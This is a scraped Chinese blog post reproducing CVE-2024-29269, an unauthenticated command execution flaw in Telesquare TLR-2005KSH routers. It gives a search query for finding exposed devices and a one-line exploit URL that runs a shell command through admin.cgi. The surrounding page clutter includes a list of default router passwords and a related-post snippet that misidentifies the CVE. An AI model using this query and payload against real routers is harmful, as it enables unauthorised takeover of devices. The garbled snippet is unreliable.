Telesquare TLR-2005KSH路由器未经授权的远程命令执行漏洞(CVE-2024-29269)

最新推荐文章于 2024-08-14 17:29:29 发布
最新推荐文章于 2024-08-14 17:29:29 发布
阅读量426 收藏
点赞数 9
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wan___she__pi/article/details/137497901
版权

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

Telesquare TLR-2005KSH是韩国Telesquare公司的一款路由器。

Telesquare TLR-2005Ksh版本1.0.0和1.1.4存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经cmd参数授权的情况下执行系统命令,并获取服务器权限。

资产搜索

title="Login to TLR-2005KSH"

漏洞复现

http://127.0.0.1/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id

cn_大腿
关注
  • 9
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2024-29269Telesquare TLR-2005KSH路由器RCE漏洞复现 [附POC]
薛定谔嘚喵博客
04-11 271
Telesquare Tlr-2005Ksh是韩国Telesquare公司的Sk Telecom Lte路由器Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权远程命令执行漏洞。攻击者可以利用此漏洞未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)(含批量验证poc)
weixin_43567873的博客
04-08 182
Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)(含批量验证poc)
Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)
0xSec
04-07 943
Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权远程命令执行漏洞。攻击者可以利用此漏洞未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
漏洞复现】京师心智心理健康测评系统MyReport.ashx存在敏感信息泄露
失心少年
03-21 223
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!漏洞链接:http://127.0.0.1/FunctionModular/PersonalReport/Ajax/MyReport.ashx?
Telesquare TLR-2005Ksh 路由器 RCE漏洞复现
0xSec
11-27 1177
Telesquare TLR-2005Ksh存在安全漏洞未经授权的攻击者可通过setSyncTimeHost执行任意命令获取服务器权限。
行业分类-设备装置-从TLR4NF-κB通路探讨芪药鸡金粥对化疗后大鼠胃肠道紧密连接蛋白的影响.zip
08-24
标题和描述中提到的研究主题是关于“从TLR4NF-κB通路探讨芪药鸡金粥对化疗后大鼠胃肠道紧密连接蛋白的影响”。这个主题涉及到几个关键的科学领域,包括医药学、分子生物学以及中药研究。下面将详细阐述这些领域的...
论文研究 - 口服病原体参与的促炎途径
05-27
牙龈卟啉单胞菌对口腔粘膜表达MMP-9的诱导主要取决于其关键内毒素,LPS,TLR4的参与以及激活Rac1和cPLA2涉及的MAPK,ERK和p38级联的激活。 ERK介导的cPLA2磷酸化在其与Rac1的膜移位中起重要作用,而Rac1的p38定位则...
poc-swagger:[POC]昂首阔步
05-09
标题中的“poc-swagger:[POC]昂首阔步”可能是指一个Proof of Concept(PoC)项目,专门针对Swagger进行的安全测试或漏洞利用。Swagger是一个流行的API开发和文档工具,它允许开发者通过OpenAPI Specification(OAS...
stc-isp v6.88K
12-06
STC8H4K64TLR, STC8H3K64S4, STC8H3K64S2, STC8G2K64S4, STC8G2K64S2, STC8C2K64S4, STC8C2K64S2, STC8A8K64D4 STC8A2K64D4, STC8A8K64S4A12, STC8F2K64S4, STC8F2K64S2 4. 增加STC8C系列头文件 5. 主菜单增加...
各种路由器的默认密码
09-06
各种路由器的默认密码 路由器默认密码  Manufacturer Product Revision Protocol User ID Password Access Level Comment 3COM CellPlex 7000 Telnet tech tech 3COM CoreBuilder 7000/6000/3500/2500 Telnet debug synnet 3COM CoreBuilder 7000/6000/3500/2500 Telnet tech tech 3COM HiPerARC v4.1.x Telnet adm (none) 3COM LANplex 2500 Telnet debug synnet 3COM LANplex 2500 Telnet tech tech 3COM LinkSwitch 2000/2700 Telnet tech tech 3COM NetBuilder SNMP ANYCOM snmp-read 3COM NetBuilder SNMP ILMI snmp-read 3COM Office Connect ISDN Routers 5x0 Telnet n/a PASSWORD Admin 3COM SuperStack II Switch 2200 Telnet debug synnet 3COM SuperStack II Switch 2700 Telnet tech tech 3COM Telnet adm (none) 3COM Telnet admin synnet 3COM Telnet manager manager 3COM Telnet monitor monitor 3COM Telnet read synnet 3COM Telnet security security 3COM Telnet write synnet 3COM AirConnect Access Point 01.50-01 Multi n/a (none) Admin 3com OfficeConnect 812 ADSL Multi adminttd adminttd Admin 3com router Multi n/a (none) Admin 更多需要请下载。。。
60%VO2max运动对血液TLR-4及其诱导产物的影响
02-23
60%VO2max运动对血液TLR-4及其诱导产物的影响,邱天,王馨塘,目的:研究60%VO2max运动对血液TLR-4 mRNA表达和蛋白水平及其诱导产物的影响,通过对60%VO2max运动对免疫功能调节的观察,探讨运动与免疫�
漏洞复现】Telesquare admin.cgi 远程代码执行漏洞(CVE-2024-29269)
qq_67810151的博客
04-07 493
Telesquare TLR-2005Ksh版本1.0.0和1.1.4存在未经授权远程命令执行漏洞。攻击者可以利用此漏洞未经cmd参数授权的情况下执行系统命令,并获取服务器权限。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 742
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
安全:企业上云后不可忽视的安全挑战与解决方案
A526847的博客
08-14 298
企业上云是数字化转型的必然趋势,但云安全风险也如影随形。企业必须正视云安全挑战,采取切实有效的措施来保障云安全。通过数据加密、访问控制、安全审计、备份与恢复、灾备管理、选择可信的云服务供应商和加强内部安全管理等手段,企业可以构建完善的云安全体系,确保云服务的可靠性和安全性。在未来的数字化转型中,云安全将成为企业不可或缺的重要保障。
安全无忧!Windows7全补丁旗舰版:集成所有补丁!
lihuiyun184291的博客
08-13 364
今日,系统之家小编给大家分享集成所有补丁的Windows7旗舰版系统,集成至2023.12所有官方补丁,修复了系统高危漏洞,让大家时刻都能舒心地展开操作。系统基于微软 Windows 7 2009 SP1 旗舰版进行离线制作,全新升级的优化方案,系统性能更好,运作更加流畅,且系统安装步骤简单易懂,支持硬盘安装。
等保2.0时代,企业如何平衡安全与发展
waitaikong_的博客
08-14 187
此外,等保2.0还强化了安全管理的要求,企业需要建立完善的安全管理体系,包括安全策略、管理制度、人员培训、应急预案等,以确保安全保护措施的有效实施。等保2.0(网络安全等级保护2.0)是中国网络安全领域的重要标准,它在原有等保1.0的基础上进行了全面升级,以适应云计算、大数据、物联网、移动互联网等新兴技术的安全保护需求。等保2.0的实施促使企业加强网络安全管理和技术防范措施,这不仅有助于提升企业的网络安全防护水平,降低安全风险,还能提高企业的竞争力和信誉度。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 2万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
合肥巢湖化工园区安全风险智能化管控平台
最新发布
qq_25467441的博客
08-14 132
柳先生:柳先生:gwh 8个1。
POC-亚姆-TLR-2005KSH-CVE-2021-45428
07-28
这是一个IT类问题,具体来说是一个安全漏洞的命名。POC代表"Proof of Concept",亚姆是指Apache的一个Web服务器,TLR是指Tomcat的日志记录器,2005KSH是指Apache Tomcat 5.5.20版本,CVE-2021-45428是指该版本中的一个已知漏洞。该漏洞可能允许攻击者通过精心构造的请求来执行远程代码。建议及时更新Tomcat以修复漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值